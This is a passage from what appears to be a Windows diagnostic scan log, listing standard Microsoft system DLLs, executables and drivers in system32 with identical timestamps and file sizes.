2020-08-17 21:32 - 2020-08-17 21:32 - 000809984 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Gaming.Input.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000804872 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\vhdmp.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000804664 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\acpi.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000802304 _____ (Microsoft Corporation) C:\Windows\system32\bisrv.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000793088 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Graphics.Printing.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000784896 _____ (Microsoft Corporation) C:\Windows\system32\wifinetworkmanager.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000781312 _____ (Microsoft Corporation) C:\Windows\system32\ChatApis.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000777216 _____ (Microsoft Corporation) C:\Windows\system32\AppointmentApis.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000768000 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Networking.Connectivity.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000765440 _____ (Microsoft Corporation) C:\Windows\system32\uReFS.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000765440 _____ (Microsoft Corporation) C:\Windows\system32\spoolsv.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000760296 _____ (Microsoft Corporation) C:\Windows\system32\taskschd.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000759808 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Web.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000758800 _____ (Microsoft Corporation) C:\Windows\system32\wimgapi.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000750592 _____ (Microsoft Corporation) C:\Windows\system32\ActivationManager.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000750080 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Storage.Search.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000747320 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000742712 _____ (Microsoft Corporation) C:\Windows\system32\LicensingWinRT.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000737792 _____ (Microsoft Corporation) C:\Windows\system32\Windows.System.Launcher.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000735744 _____ (Microsoft Corporation) C:\Windows\system32\AudioEndpointBuilder.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000733184 _____ (Microsoft Corporation) C:\Windows\system32\windows.immersiveshell.serviceprovider.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000732200 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_StorageSense.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000732160 _____ (Microsoft Corporation) C:\Windows\system32\aadcloudap.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000728576 _____ (Microsoft Corporation) C:\Windows\system32\PsmServiceExtHost.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000727040 _____ (Microsoft Corporation) C:\Windows\system32\agentactivationruntime.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000722072 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000717312 _____ (Microsoft Corporation) C:\Windows\system32\mousocoreworker.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000716312 _____ (Microsoft Corporation) C:\Windows\system32\StateRepository.Core.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000716288 _____ (Microsoft Corporation) C:\Windows\system32\agentactivationruntimewindows.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000710656 _____ (Microsoft Corporation) C:\Windows\system32\JpMapControl.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000706544 _____ (Microsoft Corporation) C:\Windows\system32\mscms.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000702464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\nwifi.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000686080 _____ (Microsoft Corporation) C:\Windows\system32\WSDApi.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000684864 _____ (Microsoft Corporation) C:\Windows\system32\SHCore.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000683008 _____ (Microsoft Corporation) C:\Windows\system32\ApplicationFrame.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000680448 _____ (Microsoft Corporation) C:\Windows\system32\ngccredprov.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000678720 _____ (Microsoft Corporation) C:\Windows\system32\StructuredQuery.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000677888 _____ (Microsoft Corporation) C:\Windows\system32\daxexec.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000666624 _____ (Microsoft Corporation) C:\Windows\system32\mbsmsapi.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000656960 _____ (Microsoft Corporation) C:\Windows\system32\d3d11on12.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000656696 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\spaceport.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000654912 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000651264 _____ (Microsoft Corporation) C:\Windows\system32\DevicesFlowBroker.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000649728 _____ (Microsoft Corporation) C:\Windows\system32\wlidprov.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000648192 _____ (Microsoft Corporation) C:\Windows\system32\cdpsvc.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000642560 _____ (Microsoft Corporation) C:\Windows\system32\osk.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000642216 _____ (Microsoft Corporation) C:\Windows\system32\TextInputFramework.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000640512 _____ (Microsoft Corporation) C:\Windows\system32\vds.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000638480 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000638464 _____ (Microsoft Corporation) C:\Windows\system32\twinui.appcore.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000638464 _____ (Microsoft Corporation) C:\Windows\system32\MBMediaManager.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000637480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\storport.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000636848 _____ (Microsoft Corporation) C:\Windows\system32\sxs.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000634680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\USBHUB3.SYS
2020-08-17 21:32 - 2020-08-17 21:32 - 000630784 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.AllJoyn.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000624640 _____ (Microsoft Corporation) C:\Windows\system32\TileDataRepository.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000621568 _____ (Microsoft Corporation) C:\Windows\system32\MusNotification.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000616960 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.LowLevel.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000608256 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.SmartCards.Phone.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000604984 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000602112 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Payments.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000601088 _____ (Microsoft Corporation) C:\Windows\system32\NgcCtnr.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000596008 _____ (Microsoft Corporation) C:\Windows\system32\AppResolver.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000594944 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_9.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000589384 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000587776 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_PCDisplay.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000578560 _____ (Microsoft Corporation) C:\Windows\system32\SppExtComObj.Exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000568832 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Speech.UXRes.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000566784 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.Wallet.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000562688 _____ (Microsoft Corporation) C:\Windows\system32\wpnprv.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000559616 _____ (Microsoft Corporation) C:\Windows\system32\WwaApi.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000558592 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_Notifications.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000553984 _____ (Microsoft Corporation) C:\Windows\system32\FirewallAPI.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000551736 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Vid.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000550400 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000549048 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.MediaControl.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000548984 _____ (Microsoft Corporation) C:\Windows\system32\WWanAPI.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000548352 _____ (Microsoft Corporation) C:\Windows\system32\EnterpriseAppMgmtSvc.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000544256 _____ (Microsoft Corporation) C:\Windows\system32\usosvc.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000540672 _____ (Microsoft Corporation) C:\Windows\system32\winspool.drv
2020-08-17 21:32 - 2020-08-17 21:32 - 000534528 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Bluetooth.UserService.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000531768 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\USBXHCI.SYS
2020-08-17 21:32 - 2020-08-17 21:32 - 000530432 _____ (Microsoft Corporation) C:\Windows\system32\MusNotificationUx.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000526848 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Graphics.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000525824 _____ (Microsoft Corporation) C:\Windows\system32\sppcext.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000524784 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Enumeration.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000522688 _____ (Microsoft Corporation) C:\Windows\system32\SystemSettingsAdminFlows.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000521728 _____ (Microsoft Corporation) C:\Windows\system32\cdpusersvc.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000516648 _____ (Microsoft Corporation) C:\Windows\system32\wimserv.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000513024 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Data.Activities.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000502784 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.WiFiDirect.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000500736 _____ (Microsoft Corporation) C:\Windows\system32\SystemSettings.UserAccountsHandlers.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000498688 _____ (Microsoft Corporation) C:\Windows\system32\ntshrui.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000495616 _____ (Microsoft Corporation) C:\Windows\system32\RTMediaFrame.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000492032 _____ (Microsoft Corporation) C:\Windows\system32\Narrator.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000481592 _____ (Microsoft Corporation) C:\Windows\system32\bcdedit.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000480768 _____ (Microsoft Corporation) C:\Windows\system32\taskcomp.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000479744 _____ (Microsoft Corporation) C:\Windows\system32\BcastDVRClient.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000477696 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.BlockedShutdown.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000477696 _____ (Microsoft Corporation) C:\Windows\system32\cryptngc.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000477184 _____ (Microsoft Corporation) C:\Windows\system32\CloudDomainJoinDataModelServer.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000476160 _____ (Microsoft Corporation) C:\Windows\system32\MicrosoftAccountWAMExtension.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000475136 _____ (Microsoft Corporation) C:\Windows\system32\Geolocation.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000472064 _____ (Microsoft Corporation) C:\Windows\system32\wlansec.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000469504 _____ (Microsoft Corporation) C:\Windows\system32\cloudAP.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000467456 _____ (Microsoft Corporation) C:\Windows\system32\modernexecserver.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000467456 _____ (Microsoft Corporation) C:\Windows\system32\FWPUCLNT.DLL
2020-08-17 21:32 - 2020-08-17 21:32 - 000465208 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000464384 _____ (Microsoft Corporation) C:\Windows\system32\webauthn.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000464384 _____ (Microsoft Corporation) C:\Windows\system32\HrtfApo.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000460200 _____ (Microsoft Corporation) C:\Windows\system32\MusNotifyIcon.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000458240 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.ConversationalAgent.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000457216 _____ (Microsoft Corporation) C:\Windows\system32\swprv.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000457216 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cldflt.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000456192 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Gaming.XboxLive.Storage.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000452608 _____ (Microsoft Corporation) C:\Windows\system32\slui.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000449888 _____ (Microsoft Corporation) C:\Windows\system32\MMDevAPI.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000448512 _____ (Microsoft Corporation) C:\Windows\system32\UserDataAccountApis.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000448000 _____ (Microsoft Corporation) C:\Windows\system32\SettingsEnvironment.Desktop.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000446464 _____ (Microsoft Corporation) C:\Windows\system32\Magnify.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000442880 _____ (Microsoft Corporation) C:\Windows\system32\PhoneOm.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000441144 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms1.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000437560 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\pci.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000434176 _____ (Microsoft Corporation) C:\Windows\system32\MicrosoftAccountExtension.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000432128 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Midi.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000429880 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\volsnap.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000427008 _____ (Microsoft Corporation) C:\Windows\system32\wlanmsm.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000425472 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\HdAudio.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000425056 _____ (Microsoft Corporation) C:\Windows\system32\wlanapi.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000422712 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fastfat.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000420152 _____ (Microsoft Corporation) C:\Windows\system32\wmicmiplugin.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000419328 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Networking.NetworkOperators.ESim.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000416768 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Usb.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000415808 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000411640 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Devices.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000408576 _____ (Microsoft Corporation) C:\Windows\system32\TaskApis.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000408064 _____ (Microsoft Corporation) C:\Windows\system32\domgmt.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000404480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\exfat.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000401408 _____ (Microsoft Corporation) C:\Windows\system32\SearchProtocolHost.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000401408 _____ (Microsoft Corporation) C:\Windows\system32\es.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000399672 _____ (Microsoft Corporation) C:\Windows\system32\SystemSettings.DataModel.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000397824 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Lights.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000395776 _____ (Microsoft Corporation) C:\Windows\system32\WiFiDisplay.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000395264 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Gaming.Preview.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000392704 _____ (Microsoft Corporation) C:\Windows\system32\NotificationControllerPS.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000392504 _____ (Microsoft Corporation) C:\Windows\system32\CloudExperienceHost.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000392192 _____ (Microsoft Corporation) C:\Windows\system32\Search.ProtocolHandler.MAPI2.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000381952 _____ (Microsoft Corporation) C:\Windows\system32\AppLockerCSP.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000381152 _____ (Microsoft Corporation) C:\Windows\system32\CredentialEnrollmentManager.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000379904 _____ (Microsoft Corporation) C:\Windows\system32\provengine.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000375296 _____ (Microsoft Corporation) C:\Windows\system32\Windows.System.Diagnostics.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000374784 _____ (Microsoft Corporation) C:\Windows\system32\ncbservice.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000374272 _____ (Microsoft Corporation) C:\Windows\system32\PickerPlatform.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000369304 _____ (Microsoft Corporation) C:\Windows\system32\BCP47Langs.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000368640 _____ (Microsoft Corporation) C:\Windows\system32\CapabilityAccessManager.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000368128 _____ (Microsoft Corporation) C:\Windows\system32\mssvp.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000363624 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000361472 _____ (Microsoft Corporation) C:\Windows\system32\vaultsvc.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000361472 _____ (Microsoft Corporation) C:\Windows\system32\QuickActionsDataModel.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000359424 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\MbbCx.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000355840 _____ (Microsoft Corporation) C:\Windows\system32\wpnclient.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000355840 _____ (Microsoft Corporation) C:\Windows\system32\WaaSMedicSvc.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000355328 _____ (Microsoft Corporation) C:\Windows\system32\WpcApi.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000355000 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\intelpep.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000353960 _____ (Microsoft Corporation) C:\Windows\system32\sppwinob.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000350720 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_SpeechPrivacy.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000342896 _____ (Microsoft Corporation) C:\Windows\system32\ttdwriter.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000342528 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Shell.BlueLightReduction.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000340992 _____ (Microsoft Corporation) C:\Windows\system32\LanguageOverlayServer.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000340328 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Storage.ApplicationData.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000338432 _____ (Microsoft Corporation) C:\Windows\system32\AppxAllUserStore.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000337920 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Acx01000.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000336960 _____ (Microsoft Corporation) C:\Windows\system32\AudioSrvPolicyManager.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000335872 _____ (Microsoft Corporation) C:\Windows\system32\RasMediaManager.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000334336 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_Cortana.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000333312 _____ (Microsoft Corporation) C:\Windows\system32\Windows.System.SystemManagement.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000331776 _____ (Microsoft Corporation) C:\Windows\system32\DAFWSD.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000327168 _____ (Microsoft Corporation) C:\Windows\system32\windows.internal.shellcommon.shareexperience.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000324608 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\xboxgip.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000324408 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000322504 _____ (Microsoft Corporation) C:\Windows\system32\wscsvc.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000318680 _____ (Microsoft Corporation) C:\Windows\system32\ExecModelClient.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000317440 _____ (Microsoft Corporation) C:\Windows\system32\ConhostV1.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000316928 _____ (Microsoft Corporation) C:\Windows\system32\SyncSettings.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000314368 _____ (Microsoft Corporation) C:\Windows\system32\wc_storage.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000312832 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000312320 _____ (Microsoft Corporation) C:\Windows\system32\sppcommdlg.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000311608 _____ (Microsoft Corporation) C:\Windows\system32\CloudExperienceHostBroker.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000307712 _____ (Microsoft Corporation) C:\Windows\system32\sppcomapi.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000306688 _____ (Microsoft Corporation) C:\Windows\system32\netplwiz.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000306496 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbvideo.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000302080 _____ (Microsoft Corporation) C:\Windows\system32\WpcTok.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000297272 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\sdbus.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000295936 _____ (Microsoft Corporation) C:\Windows\system32\TDLMigration.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000294400 _____ (Microsoft Corporation) C:\Windows\system32\provops.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000293888 _____ (Microsoft Corporation) C:\Windows\system32\vdsbas.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000293888 _____ (Microsoft Corporation) C:\Windows\system32\UserDeviceRegistration.Ngc.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000292664 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\msiscsi.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000291328 _____ (Microsoft Corporation) C:\Windows\system32\DeviceDirectoryClient.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000291256 _____ (Microsoft Corporation) C:\Windows\system32\wscapi.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000290304 _____ (Microsoft Corporation) C:\Windows\system32\vaultcli.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000289792 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.WiFi.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000288256 _____ (Microsoft Corporation) C:\Windows\system32\mdmregistration.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000287232 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.AppDefaults.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000285696 _____ (Microsoft Corporation) C:\Windows\system32\directxdatabaseupdater.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000285184 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000285184 _____ (Microsoft Corporation) C:\Windows\system32\WaaSMedicCapsule.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000284160 _____ (Microsoft Corporation) C:\Windows\system32\container.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000283144 _____ (Microsoft Corporation) C:\Windows\system32\browserbroker.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000282112 _____ (Microsoft Corporation) C:\Windows\system32\ngcpopkeysrv.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000281600 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.HumanInterfaceDevice.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000280064 _____ (Microsoft Corporation) C:\Windows\system32\cmd.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000277504 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_CapabilityAccess.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000275256 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mssecflt.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000274432 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Security.Authentication.Identity.Provider.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000273408 _____ (Microsoft Corporation) C:\Windows\system32\MicrosoftAccountCloudAP.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000273208 _____ (Microsoft Corporation) C:\Windows\system32\CloudExperienceHostUser.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000271872 _____ (Microsoft Corporation) C:\Windows\system32\provhandlers.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000270336 _____ (Microsoft Corporation) C:\Windows\system32\DesktopSwitcherDataModel.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000269312 _____ (Microsoft Corporation) C:\Windows\system32\InkEd.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000268800 _____ (Microsoft Corporation) C:\Windows\system32\ubpm.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000268288 _____ (Microsoft Corporation) C:\Windows\system32\dot3svc.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000265728 _____ (Microsoft Corporation) C:\Windows\system32\netman.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000265216 _____ (Microsoft Corporation) C:\Windows\system32\cdd.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000263680 _____ (Microsoft Corporation) C:\Windows\system32\wcmcsp.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000261632 _____ (Microsoft Corporation) C:\Windows\system32\bthprops.cpl
